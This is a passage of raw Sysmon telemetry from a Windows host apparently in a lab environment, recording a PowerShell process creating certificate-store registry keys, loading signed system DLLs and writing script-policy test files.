17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530185Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530184Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530183Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530182Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530181Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530180Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530179Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530178Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530177Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530176Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530175Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 23542300x80000000000000001530174Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_t1scncc4.xae.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 23542300x80000000000000001530173Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oh243hop.l2p.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 734700x80000000000000001530172Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001530171Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=FD7801997C3D60A432EAC5A08DF42C37,SHA256=E27CFC72999B8AB72BB0EAF1B75F13826C644CAF2F97980CC4A3AD3FE2D98BBEtrueMicrosoft CorporationValid 12241200x80000000000000001530170Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530169Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll10.0.14393.0 (rs1_release.160715-1616)Crypto SIP provider for signing and verifying PowerShell script files (.ps1/.ps1xml)Microsoft® Windows® Operating SystemMicrosoft Corporationpwrshsip.dllMD5=5366DEE11C59571EC48B56020E8949DE,SHA256=EE5CDBEDA2067413ACB7B5E7B4AF53B40336148CA104D1671212B43737EB348CtrueMicrosoft WindowsValid 734700x80000000000000001530168Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\27b60a7418e19c1fccb099900e2e182a\System.Data.ni.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=5B8A1387F38B3747F281326AE0AE6046,SHA256=72AFDE4C5841503A8DA13C06C8132644F73CE9B49086AF3B3DDBA5F85FA3D3D4false-Unavailable 734700x80000000000000001530167Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\iertutil.dll11.00.14393.4283 (rs1_release.210303-1802)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=5541A4A7FB64063F8AFB192ABD4DAE70,SHA256=AABF2E6C392F29B77F076BF705976B68B3100138BC63060335BD154B8417754DtrueMicrosoft WindowsValid 734700x80000000000000001530166Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\urlmon.dll11.00.14393.4225 (rs1_release.210127-1811)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=37266F6D0E2F86FD3FC6E4724ED49823,SHA256=8AD484F4A7964D2D87047771BB21D3211F204F87D4EB029C1EFAA4FD935333B1trueMicrosoft WindowsValid 734700x80000000000000001530165Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8trueMicrosoft WindowsValid 734700x80000000000000001530164Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OpcServices.dll10.0.14393.2848 (rs1_release.190305-1856)Native Code OPC Services LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationOpcServices.dllMD5=991F8CCB43104DE3BD6E24A4D2BF870D,SHA256=8187C096A269D20742DEC9B651536F1C7A354D114B176179B1F4E090BB28E1F2trueMicrosoft WindowsValid 734700x80000000000000001530163Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\AppxSip.dll10.0.14393.4169 (rs1_release.210107-1130)Appx Subject Interface PackageMicrosoft® Windows® Operating SystemMicrosoft CorporationAppxSip.dllMD5=33AEB645167296EFE22E1BB64B63CBFC,SHA256=6E2B948F3CD7EEC6D9A9A864476F074FB5876E397916FF81A39B23976489AB52trueMicrosoft WindowsValid 734700x80000000000000001530162Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wshext.dll5.812.10240.16384Microsoft ® Shell Extension for Windows Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwshext.dllMD5=BA425FEBA35E20778ADB8FAF7268D8A0,SHA256=3A2F8057B4312BE9389CB86C8C3FA8BA3A590E3CE811AB163D77159DB095AA41trueMicrosoft WindowsValid 13241300x80000000000000001530161Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530160Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530159Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530158Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530157Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530156Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530155Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValid 734700x80000000000000001530154Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msisip.dll5.0.14393.4350 (rs1_release.210407-2154)MSI Signature SIP ProviderWindows Installer - UnicodeMicrosoft CorporationMSISIP.DLLMD5=D847084F61752DB23D027FFC3CBEF8F7,SHA256=2061D01C7612A6010BDD83E0BB339A1040C8077595AD7A51C9E3ADC4B501B4BFtrueMicrosoft WindowsValid 734700x80000000000000001530153Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\a9817b0436b3d1ea69912071b1772668\System.Numerics.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Numerics.dllMD5=277A874D3C7FAF514D476913C562779E,SHA256=B0EBBA50E089358BBE363BB14DE6D80AB1F92F52C30C8FE13BC4358C8BB252B1false-Unavailable 734700x80000000000000001530152Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gpapi.dll10.0.14393.3986 (rs1_release.201002-1707)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=601EDCF334B3DA561BE85560BFAB4831,SHA256=69422D4F7B2E9673178761052D25718F2F1F1D7D5B0962798ECAC66C123FB207trueMicrosoft WindowsValid 12241200x80000000000000001530151Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530150Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\497f2b8232570a09da6c199ca8afab42\System.DirectoryServices.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.DirectoryServices.dllMD5=1C9EB8C8F79E7AE6D1837A92AEA937C9,SHA256=3FDBD432E9BD0A40D636E64FED0E27AFA7AFE8EC8DFBAF1CEB0E02CF9D45E191false-Unavailable 734700x80000000000000001530149Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\f9f16cefed221a89bd7ccc6559a3e466\System.Management.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Management.dllMD5=A2398F5CDEEC4226380CB620C5D180D8,SHA256=4007C9B8A5360D49CD4DA98D262DA539AD790AA13CA54712757441B1C56F2980false-Unavailable 12241200x80000000000000001530148Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x80000000000000001530147Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x80000000000000001530146Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 12241200x80000000000000001530145Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x80000000000000001530144Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x80000000000000001530143Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530142Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530141Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530140Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530139Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530138Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530137Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530136Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 11241100x80000000000000001530135Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_t1scncc4.xae.psm12021-04-21 17:30:08.516 12241200x80000000000000001530134Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 734700x80000000000000001530133Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\3641fa87cb8b7dc353a2444b67599334\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=016FE7AF94AF0BFB824D63F6B0688E43,SHA256=AE20EA6C343733690F1BB9B5963AEA624FFB3B86FAC697FA4C16A753363B291Cfalse-Unavailable 12241200x80000000000000001530132Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530131Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530130Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530129Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530128Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530127Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530126Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530125Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530124Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust 11241100x80000000000000001530123Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oh243hop.l2p.ps12021-04-21 17:30:08.516 12241200x80000000000000001530122Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs 12241200x80000000000000001530121Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs 12241200x80000000000000001530120Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates 12241200x80000000000000001530119Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x80000000000000001530118Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x80000000000000001530117Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x80000000000000001530116Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530115Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530114Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530113Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 